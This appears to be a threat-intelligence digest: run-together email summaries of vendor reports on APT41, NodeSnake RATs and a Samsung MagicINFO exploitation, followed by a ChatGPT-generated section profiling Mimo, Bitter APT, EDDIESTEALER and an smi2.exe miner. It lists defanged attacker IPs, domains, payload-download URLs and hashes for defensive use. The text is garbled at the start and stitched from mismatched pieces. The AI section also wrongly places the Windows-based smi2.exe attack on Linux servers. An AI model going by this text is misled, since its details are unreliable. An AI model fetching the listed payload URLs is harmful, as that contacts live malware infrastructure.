sha256=d1d957406e9177a1ab10bb5a4d2d4dfb3ac971c390f8383eeaa263bdf8038058, - sha256=d6c3c83d8549c691972e8fe91277c579efe83b731d5a1669d42692b0b3a17980, - sha256=d8d1635a515fd3afb2ccfbd2a82feb2c2150161872f3a4babd90146626fe8355, - sha256=de9117872e6b32d01fe2e2ec54899641486a1ebb3439123aadea8d5388617eee, - sha256=e5d34a8a39ae067efe12336732f43775fa8eaf86e0d7668816780d1db9821e5d, - sha256=e9808c0e5ebba9aa2b2b5f856d1cb6965f6b5fa49e22dc423251786bb46ac2b7, - sha256=ed8684894015e74ff5cf217cbda2f2036e7c9f573f9b0aa46e29e7ff8c13f11b, - sha256=f29e98d60486472e80d2fac7afa7433bad74d69e25ba8b9533c3b23d6b6be9bd, - sha256=f3bd3637ad90eae0bfa31c0735fa3bb2e0d7061f63456f7479948ce7e8cd7310, - sha256=f3f1ac9e1739a840242c9c215080085af61500dbe7bfd01886fe972e0ca22a26, - sha256=f55bb674f524ea72d91dba894ea5448ecf92aab7bceb0cf0025383483e72cc1f, - sha256=f80313b4e2d743c94571a98d1672ffc3bc003209c6315ce2a22a9989aae051c2, - sha256=f90e8f85f79cbff664ad3c4758f1bed8a6ebc2a712180d675ff560bea2b88c65, - sha256=fc56184a160c0fbb3d2a98e5955dfad4e09e3a8db99f162199d9c1f419460984, - sha256=09375c5edc56752d5b8d84cb433e6a2151a57b02938bb84e1e07deefbcede3aa, - sha256=0c4015083a3eefa815d0f5310b112e7aff27199d38d5605f88a79dcab85db2b5, - sha256=526610d0cf97982044b892731a7d47832893028c67e85c1ae04092c7e05dd827, - sha256=bc647e05eea89ea9b5ec3ce728e3c039dd2abd17441e7c39cf130f292edd6efcemail:Title: Mark Your Calendar: APT41 Innovative TacticsLink: https://cloud.google.com/blog/topics/threat-intelligence/apt41-innovative-tactics/Summary: In late October 2024, the Google Threat Intelligence Group (GTIG) identified malware named "TOUGHPROGRESS" being disseminated via a compromised government website, attributed to the Chinese cyber threat actor group APT41. The malware utilized Google Calendar for command and control activities, employing spear phishing emails directing targets to a ZIP archive that included a deceptive LNK file posing as a PDF. TOUGHPROGRESS features three key modules that employ stealth techniques to avoid detection and communicate through encrypted commands via Google Calendar. GTIG countered the campaign by creating detection signatures, dismantling associated infrastructure, and collaborating with the Mandiant FLARE team to analyze the malware's encryption protocol, while emphasizing APT41’s historical use of legitimate cloud services for malicious activities.Threats: winnti_group toughprogress spear-phishing_technique process_hollowing_technique plusdrop plusinject voldemort dusttrap plusbedIndicators of compromise:-------------------------ip: domain: word[.]msapp[.]workers[.]dev, cloud[.]msapp[.]workers[.]dev, term-restore-satisfied-hence[.]trycloudflare[.]com, ways-sms-pmc-shareholders[.]trycloudflare[.]com, resource[.]infinityfreeapp[.]com, pubs[.]infinityfreeapp[.]comurl: https://lihi[.]cc/6dekU, https://tinyurl[.]com/hycev3y7, https://my5353[.]com/nWyTf, https://reurl[.]cc/WNr2Xy, https://lihi[.]cc/v3OyQ, https://lihi[.]cc/5nlgd, https://lihi[.]cc/edcOv, https://lihi[.]cc/4z5sh, https://tinyurl[.]com/mr42t4yv, https://tinyurl[.]com/mpa2c5wj, https://tinyurl[.]com/3wnz46pv, https://my5353[.]com/ppOH5, https://my5353[.]com/fPUcX, https://my5353[.]com/ZwEkm, https://my5353[.]com/vEWiT, https://www[.]googleapis[.]com/calendar/v3/calendars/ff57964096cadc1a8733cf566b41c9528c89d30edec86326c723932c1e79ebf0@group[.]calendar[.]google[.]com/eventshash: - md5=2ec4eeeabb8f6c2970dcbffdcdbd60e3, - md5=9492022a939d4c727a5fa462590dc0dd, - md5=dccbb41af2fcf78d56ea3de8f3d1a12c, - md5=39a46d7f1ef9b9a5e40860cd5f646b9d, - md5=876fb1b0275a653c4210aaf01c2698ec, sha256=3b88b3efbdc86383ee9738c92026b8931ce1c13cd75cd1cda2fa302791c2c4fb, - sha256=50124174a4ac0d65bf8b6fd66f538829d1589edc73aa7cf36502e57aa5513360, md5=65da1a9026cf171a5a7779bc5ee45fb1, - md5=1ca609e207edb211c8b9566ef35043b6, sha256=151257e9dfda476cdafd9983266ad3255104d72a66f9265caa8417a5fe1df5d7email:Title: Threat Intelligence NodeSnake Malware CampaignLink: https://www.quorumcyber.com/wp-content/uploads/2025/04/20250416-Higher-Education-Sector-RAT-MP.pdfSummary: In early 2025, Quorum Cyber's Threat Intelligence team analyzed two Remote Access Trojans (RATs), NodeSnake.A and NodeSnake.B, which were found targeting UK higher education institutions. The study highlighted the evolution of NodeSnake, with NodeSnake.B showcasing enhanced capabilities such as improved stealth, operational flexibility, and the ability to execute interactive payloads for real-time command execution. Both variants leverage legitimate infrastructure, particularly Cloudflare, for command-and-control communication, and the investigation linked NodeSnake to the ransomware group Interlock, suggesting a broader campaign against high-value organizations involving tactics like double extortion through data leaks and ransom notes. The analysis underscored a rising trend of using Cloudflare Tunnels for RAT delivery and the sophisticated operational framework of NodeSnake, marking it as a significant cyber threat with advanced evasion techniques.Threats: nodesnake interlock xworm_rat asyncrat venomratIndicators of compromise:-------------------------ip: 212[.]237[.]217[.]182, 168[.]119[.]96[.]41, 216[.]245[.]184[.]181, 140[.]82[.]44[.]117, 45[.]61[.]136[.]202, 84[.]200[.]24[.]41, 45[.]61[.]136[.]228, 188[.]34[.]195[.]44domain: speak-head-somebody-stays[.]trycloudflare[.]com, mortgage-i-concrete-origins[.]trycloudflare[.]com, musicians-implied-less-model[.]trycloudflare[.]com, suffering-arnold-satisfaction-prior[.]trycloudflare[.]com, strain-brighton-focused-kw[.]trycloudflare[.]com, sublime-forecasts-pale-scored[.]trycloudflare[.]com, washing-cartridges-watts-flags[.]trycloudflare[.]com, investigators-boxing-trademark-threatened[.]trycloudflare[.]comurl: http://23[.]95[.]182[.]59/31279geuwtoisgdehbiuowaehsgdb/cht, http://23[.]95[.]182[.]59/31279geuwtoisgdehbiuowaehsgdb/klg, https://apple-online[.]shop/ChromeSetup[.]exe, https://rvthereyet[.]com/wp-admin/images/rsggl[.]phphash: - md5=f76d907ca3817a8b2967790315265469, - md5=e11d147dad6e47a1cecb1f7255f95a55, - md5=f7f679420671b7e18677831d4d276277, - sha1=5cc18e0df62c0d68710e14b31e2270f2ec7ed166, - sha1=1cb6a93e6d28d63d479a1ea59f7d5b258f15c5c3, - sha256=f99fb136427fc8ed344d455eb1cbd7eabc405620ae8b4205d89a8e2e1e712256, - sha256=e86bb8361c436be94b0901e5b39db9b6666134f23cce1e5581421c2981405cb1email:Title: When Samsung’s Magic Turns Tragic: A Tale of Unauthorized MiningLink: https://www.esentire.com/blog/when-samsungs-magic-turns-tragic-a-tale-of-unauthorized-miningSummary: In mid-May 2025, a critical vulnerability (CVE-2025-4632) in Samsung MagicINFO 9 Server was exploited, allowing threat actors to execute remote code and write files with system-level privileges. Scoring 9.8 on the CVSS scale, the vulnerability enabled attackers to implement automated commands for persistence, install the remote management tool AnyDesk, and deploy a variant of the XMRig cryptocurrency miner disguised as "smi2.exe." The attack began with reconnaissance using the legitimate process tomcat9.exe, and progressed through multi-stage PowerShell and batch scripts, facilitating the creation of administrative users and manipulation of antivirus settings, ultimately achieving unauthorized Monero mining while avoiding detection through stealthy operations.Threats: xmrig_miner anydesk_tool lolbin_technique disabling_antivirus_techniqueIndicators of compromise:-------------------------ip: 157[.]230[.]106[.]100, 173[.]249[.]48[.]227, 185[.]213[.]26[.]27domain: crmmr[.]icc[.]meurl: http://157[.]230[.]106[.]100/mobile/winapp[.]php?app=SMIW&port=80&xbf=smi2[.]exe&ar=1&dbg=1&sdir=RND&rdir=%TEMP%&dlt=pshell, https://crmmr[.]icc[.]me/mobile/winapp[.]php?app=SMIWS&port=443&xbf=smi2[.]exe&ar=1&dbg=1&sdir=RND&rdir=%TEMP%&dlt=pshell, http://157[.]230[.]106[.]100/mobile/winapp[.]php?app=SMIW&port=80&dlt=cutil&xbf=smi2[.]exe&dbg=1&ar=1&sdir=RND&rdir=%TEMP%, https://crmmr[.]icc[.]me/mobile/winapp[.]php?app=SMIWS&port=443&dlt=cutil&xbf=smi2[.]exe&dbg=1&ar=1&sdir=RND&rdir=%TEMP%, http://157[.]230[.]106[.]100/mobile/winapp[.]php?app=SMIW&port=80&dlt=curl&xbf=smi2[.]exe&dbg=1&ar=1&sdir=RND&rdir=%TEMP%, https://crmmr[.]icc[.]me/mobile/winapp[.]php?app=SMIWS&port=443&dlt=curl&xbf=smi2[.]exe&dbg=1&ar=1&sdir=RND&rdir=%TEMP%, http://157[.]230[.]106[.]100/mobile/winapp[.]php?app=SMIW&port=80&dlt=curl&xbf=smi2[.]exe&dbg=1&ar=1&sdir=RNDhash: - md5=2b9c5f6f01a7a06beeb533967a6e23ef, - sha256=9303b671778422754bcf8fc97cd99f9f19173473ff515a6956bc61bc1de84389, - md5=93d9d7b19403a6b794cbf4277e66bca0, - sha256=e482617f9e9066bb875e2973bf3f469074cb266ec270deed933b8bd27070f62b, - md5=c0ed4f906576c06d861302e8cf924309, - sha256=8e1c569508baacd7803f80728c03ed1d6ab098a1576c6470420e7a3af84c489c, - md5=5b8961a8c3b6ca1d1e2ef3155c7c1b53, - sha256=116fbb00ecdfe1ff4a9511e096c30a233b02be54d38e9a3d6a7e43a3205b1640, - md5=d9c1409e32a1b33070bed3a295123e66, - sha256=a8607309f60e9f1fac7f850d0daa8c41986a4fede610852b9e3ef8a3d5527a59, - md5=0c0195c48b6b8582fa6f6373032118da, - sha256=11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5email:This article was generated with the assistance of an artificial intelligence language model, ChatGPT.
Analysis Summary
The provided article summarizes findings from multiple, distinct threat intelligence reports. Since the request requires focusing on a *specific* threat actor, I will structure the findings associated with each identified actor/group mentioned in the summaries.
# Threat Actor: Mimo intrusion set (Mimo Group)
## Attribution & Identity
Identified as the "Mimo intrusion set" or "Mimo group."
## Activity Summary
Actively exploited the critical vulnerability CVE-2025-32432 (a remote code execution flaw) in the Craft Content Management System between February 28 and May 2, 2025. The group is expanding its operations to include ransomware alongside its primary cryptomining activities.
## Tactics, Techniques & Procedures
- Exploitation of CVE-2025-32432 via specially crafted GET requests.
- Deployment of a webshell.
- Running infection scripts for deployment of malware.
- Maintaining a significant online presence suggestive of their operational methods.
- Diversifying tactics to incorporate ransomware.
## Targeting
- Sectors: Organizations utilizing Craft Content Management System.
- Geography: Not explicitly mentioned, implied global based on software usage.
- Victims: Unknown specific organizations mentioned in this summary.
## Tools & Infrastructure
- Malware families used: Cryptominer, Residential Proxyware, Ransomware (newly incorporated).
- Specific ELF binary used: `4l4md4r`.
- Infrastructure (C2, domains, IPs):
- IP: 85[.]106[.]113[.]168
- Domain: windows[.]n1tro[.]cyou
- URLs: http://15[.]188[.]246[.]198/alamdar[.]x86_64, http://15[.]188[.]246[.]198/4l4md4r[.]sh, http://15[.]188[.]246[.]198/hezb[.]x86_64
- Email: 4l4md4r@proton[.]me
## Implications
The group is prioritizing financial gain, evidenced by cryptomining and the addition of ransomware, indicating an increased threat to operational uptime and data confidentiality for vulnerable organizations.
## Mitigations
Patching/securing known instances of Craft CMS against CVE-2025-32432. Monitoring for unauthorized webshell deployment.
***
# Threat Actor: Bitter APT (Bitter Group)
## Attribution & Identity
Identified as "Bitter APT" or "bitter\_group." Operationally linked to the "sindoor\_campaign."
## Activity Summary
Conducted a spear-phishing campaign targeting the Pakistan Telecommunication Company Limited (PTCL) on May 7, 2025, amid heightened regional military tensions between Pakistan and India. The objective was espionage and establishing persistent access.
## Tactics, Techniques & Procedures
- Spear-phishing campaigns.
- Exploiting compromised email credentials from the Pakistan Counter Terrorism Department (CTD).
- Delivery via malicious IQY files.
- Technique: Supply Chain (implied via credential compromise), LOLBIN usage.
- Malware execution achieving persistent access.
## Targeting
- Sectors: Telecommunications.
- Geography: Pakistan.
- Victims: Pakistan Telecommunication Company Limited (PTCL).
## Tools & Infrastructure
- Malware families used: WmRAT variant.
- Infrastructure (C2, domains, IPs):
- IPs: 185[.]244[.]151[.]84, 185[.]244[.]151[.]87
- Domains: tradesmarkets[.]greenadelhouse[.]com, jacknwoods[.]com, greenadelhouse[.]com
- URLs: https://fogomyart[.]com/vcswin
## Implications
This actor demonstrates state-aligned capabilities by targeting critical national infrastructure during a period of geopolitical tension, suggesting intelligence gathering as a primary goal.
## Mitigations
Heightened email security awareness, strict controls on opening attachments from external or unexpected sources, and rigorous monitoring for suspicious IQY file execution or lateral movement originating from compromised endpoints.
***
# Threat Actor: EDDIESTEALER (New InfoStealer Campaign)
## Attribution & Identity
This section describes the campaign distributing a *new* malware named EDDIESTEALER. No established threat actor name is explicitly attributed to its development or propagation in this summary, but it is associated with "CAPTCHAcampaigns."
## Activity Summary
Disseminating the new Rust-based EDDIESTEALER via deceptive Fake CAPTCHA campaigns targeting Windows systems.
## Tactics, Techniques & Procedures
- Acquisition method: Deceptive Fake CAPTCHA web pages.
- Stages: Malicious JavaScript payload initiates the infection, prompting the user to execute a PowerShell script, which then downloads the stealer.
- Evasion: Custom API call mechanisms, NTFS Alternate Data Streams for self-deletion.
- Data Exfiltration: Communicates via multiple HTTP POST requests, mimics credential theft interactions with browser password managers.
## Targeting
- Sectors: General user population with Windows systems.
- Geography: Not specified.
- Victims: Windows users whose credentials and cryptocurrency wallets are targeted.
## Tools & Infrastructure
- Malware families used: EDDIESTEALER (written in Rust).
- Related/Associated Tools: ghostpulse, unicorn\_tool, chromekatz\_tool, cookiemonster, cookiekatz\_tool, credentialkatz\_tool.
- Infrastructure (C2, domains, IPs):
- IPs: 45[.]144[.]53[.]145, 84[.]200[.]154[.]47
- Domains: shiglimugli[.]xyz, xxxivi[.]com, llll[.]fit, plasetplasti
## Implications
The use of Rust suggests technical sophistication, aiming for memory safety and potentially complicating automated analysis/reverse engineering efforts. Focus on credential and crypto theft points to direct financial motives.
## Mitigations
Block known malicious domains/IPs. Implement browser/credential monitoring solutions. Sandboxing or restricting execution of PowerShell scripts initiated by untrusted sources (e.g., JavaScript interactions).
***
# Threat Actor: Unspecified Actor utilizing persistence and cryptomining (Associated with `smi2.exe`)
## Attribution & Identity
No specific threat actor name is provided for this activity, which involves deploying cryptomining malware related to `smi2.exe` on compromised Linux servers (indicated by ELF binaries).
## Activity Summary
Observed performing deep system compromise on Linux hosts. The activity includes reconnaissance, multi-stage script execution (PowerShell and batch), persistence setup, installation of remote access tools, and deployment of Monero mining software, actively manipulating antivirus configurations.
## Tactics, Techniques & Procedures
- Reconnaissance using legitimate process (`tomcat9.exe`).
- Multi-stage execution via PowerShell and batch scripts.
- Persistence mechanisms automated via scripts.
- Antivirus disabling techniques.
- Privilege escalation through creation of administrative users.
- Remote Access: Installation of AnyDesk.
## Targeting
- Sectors: Linux Server environments (likely web service providers or general enterprise).
- Geography: Not specified.
- Victims: Organizations running Linux servers.
## Tools & Infrastructure
- Malware families used: XMRig cryptocurrency miner (disguised as `smi2.exe`), AnyDesk tool.
- Infrastructure (C2, domains, IPs):
- IPs: 157[.]230[.]106[.]100, 173[.]249[.]48[.]227, 185[.]213[.]26[.]27
- Domain: crmmr[.]icc[.]me
- URLs: (Multiple URLs delivering payloads via `pshell`, `cutil`, or `curl` parameters) e.g., http://157[.]230[.]106[.]100/mobile/winapp[.]php?app=SMIW&port=80&xbf=smi2[.]exe&ar=1&dbg=1&sdir=RND&rdir=%TEMP%&dlt=pshell
## Implications
The actor seeks long-term access (using AnyDesk and persistence mechanisms) to leverage victim resources solely for financial gain via Monero mining, posing operational risk and significant resource drain.
## Mitigations
Strong host-based security monitoring for script execution, unauthorized user creation, and changes to AV configurations. Employing strict firewall rules to limit outbound connections for unknown processes. Securing Tomcat installations and ensuring robust Linux server hardening.